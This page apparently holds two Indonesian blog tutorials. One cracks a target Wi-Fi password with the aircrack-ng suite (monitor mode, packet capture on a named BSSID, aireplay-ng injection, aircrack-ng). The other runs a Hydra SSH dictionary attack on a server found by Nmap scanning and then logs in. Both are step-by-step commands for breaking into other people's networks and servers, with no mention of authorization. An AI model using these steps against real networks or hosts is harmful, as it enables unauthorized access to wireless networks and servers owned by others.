Pada Postingan kali ini, kita akan belajar cara mudah hack wifi password pada kali linux. Kenapa harus di kali linux ? Sebenarnya hacking bisa dilakukan pada OS apa saja, namun kebanyak para hacker menggunakan kali linux karena tool hackingnya sudah lengkap dan siap di jalankan. Begitu pula untuk hack password, ada cara mudah nya yaitu kita tinggal jalankan application dari bawaan OS kali linuxnya. Nama tool untuk hack wifi password di kali linux ini adalah Aircrack-ng

Dipostingan sebelumnya saya sudah pernah membahas mengenai Cara Hack Password pada server, dimana kita menggunakan metode Dictionary Attack, namun pada pada postingan kali ini kita tinggal menggunakan tool hack bawaan kali linux nya.

Hal yang perlu kita lakukan adalah

1. Siapkan Kali linux dan pastikan tidak terhubung pada wifi manapun gunakan perintah airmon-ng check kill

2. Masuk pada terminal lalu ketikkan perintah airmon-ng


3.  Kemudian kita akan mengubah interface wlan 0 menjadi wlan0mon, ketikkan perintah airmon-ng start wlan0  


4. Selanjutnya ketikkan perintah airodump-ng wlan0mon. Perintah ini digunakan untuk melihat semua jaringan wifi yang tersedia pada wlan0mon. 


5.  Setelah menemukan target wifi untuk dihack, selanjutnya buka terminal baru dan masukkan perintah airodump-ng -c 3 -w simpan -bssid 02:0B:6B:D9:29:55 wlan0mon. Simpan itu adalah bssid dari wifi target yang nantinya akan kita buatkan list baru dengan nama simpan.cap. hasilnya adalah proses yang tidak berhenti karena traffic yang berjalan.


6. Selanjutnya masukkan perintah aireplay-ng -1 0 –a 02:0B:6B:D9:29:55 wlan0mon  

7. Masukkan perintah aireplay-ng -3 –b 02:0B:6B:D9:29:5 wlan0mon  


8.  Terakhir ketikan perintah aircrack-ng simpan.cap. Tunggu sampai proses selesai maka akan didapati seperti ini. 
Langkah terakhir tinggal connect kan ke wifi target dengan password yang telah ditemukan.

Selamat Mencoba...

#SalamHacking

Wednesday, October 17, 2018

Cara Hack Password Server Menggunakan Metode Dictionary Attack

Cara Hack Password Server Menggunakan Metode Dictionary Attack




Hacking merupakan sebuah aktivitas atau kegiatan meretas ataupun menerobos sistem keamanan pada sebuah komputer yang tujuannya agar si hacker dapat mengambil alih komputer milik korban. Dalam dunia hacking banyak sekali metode-metode yang digunakan untuk melancarkan serangan hacking mereka. Hacking yang paling umum dilakukan adalah dengan hack password. 

Banyak sekali metode untuk hack password ini, namun pada artikel ini kita akan membahas salah satu metode yang digunakan untuk hack password sebuah server. Metode yang akan kita pakai adalah metode Dictionary Attack

Kalau kita terjemahkan metode ini adalah serangan kamus. Ya, jadi kita akan menggunakan sebuah kumpulan list yang berisi password-password kemungkina pada sebuah sistem. Dengan metode hack ini biasanya sebuah server menggunkan password yang komplex maupun sederhana. Oleh karena itu, kita harus membuat sendiri wordlist nya

Hal yang harus kita lakukan pertama kali untuk melakukan hack password server ini adalah dengan mengetahui kebutuhan apa saja yang diperlukan. Untuk metode Dictionary Attack ini kita membutuhkan:
  1. Aplikasi Scanning Port
  2. Tools Dictionary Attack
Aplikasi Scanning port ini dibutuhkan untuk mengetahui port yang terbuka pada server, sehingga kita bisa masuk melalui port tersebut. Aplikasi yang umumnya dipakai adalah Nmap/Zenmap.

Kemudian untuk Toolnya bisa pakai HYDRA.

Jika semua nya sudah siap lakukan langkah-langkah berikut :

Langkah 1 

Pastikan kita memiliki IP Address server untuk kita bobol. Pada kasus ini saya ambil contoh IP sepert ini 192.168.9.199. Kemudian buka aplikasi Zenmap, lakukan proses scanning seperti gambar berikut:



Langkah 2

Pada tahap ini, proses hack password server menggunakan metode dictionary attack ini ditentukan. Kita harus membuat Wordlist yang berisi kemungkinan password dari server. Disini saya membuat dua file berbeda yaitu user.txt dan pass.txt.

 wordlist user.txt

 wordlist pass.txt


Langkah 3
Setelah selesai melakukan Wordlisting, selanjutnya kita akan menjalankan tools hacking nya yaitu HYDRA. Penggunaan tools HYDRA ini saya menggunakan OS Linux, jika kalian menggunakan windows silahkan sesuaikan penggunaanya lihat pada link resminya, atau kalian menggunakan linux pada Virtual Machine. Perintah untuk scanning passwordnya menggunakan HYDRA adalah hydra -L user.txt -P pass.txt 192.168.9.199 ssh.
User.txt dan pass.txt adalah wordlist yang kita buat tadi, sedangkan ssh adalah port yang terbuka saat kita melakukan scanning port menggunkan NMAP tadi.


Jika berhasil login dan password yang cocok akan ditampilkan seperti gambar diatas. Jika gagal maka anda harus melakukan perubahan terus-menerus pada wordlist nya sampai menemukan password yang cocok.

Langkah 4

Coba login ke server yang sudah di hack tadi dengan menggunakan password yang didapat. Remote server menggunakan aplikasi Putty

  
Setelah masuk, anda dapat melakukan apa saja pada server tersebut.



Selamat Mencoba....
 
Salam Hacking :)